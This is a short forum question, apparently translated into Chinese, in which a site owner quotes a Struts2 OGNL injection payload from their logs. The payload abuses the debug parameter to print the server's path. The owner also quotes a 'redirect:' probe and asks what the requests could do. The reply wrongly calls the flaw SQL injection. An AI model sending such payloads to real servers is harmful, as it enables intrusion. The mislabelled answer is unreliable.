今天我已经登录并第一次看到它了:
mysite.com/?debug=command&expression=%23res%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()
之后的另一个:
mysite.com/?redirect:
它能导致什么?注射数据库?病毒
答案 0 :(得分:1)
看起来有人正在尝试利用struts2中的SQL注入漏洞来执行远程代码执行。